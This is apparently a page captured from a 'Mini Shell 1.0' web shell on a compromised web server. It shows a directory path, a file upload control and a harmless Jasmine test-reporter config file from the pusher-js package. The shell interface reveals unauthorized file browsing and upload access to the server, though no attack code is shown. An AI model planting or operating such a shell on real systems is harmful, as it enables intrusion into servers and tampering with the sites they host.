HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/node_modules/pusher-js/spec/config/jasmine/helpers/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/pusher-js/spec/config/jasmine/helpers/reporter.js
const SpecReporter = require('jasmine-spec-reporter').SpecReporter;

jasmine.getEnv().clearReporters();

jasmine.getEnv().addReporter(
  new SpecReporter({
    spec: {
      displayPending: true
    },
    summary: {
      displayDuration: false
    }
  })
);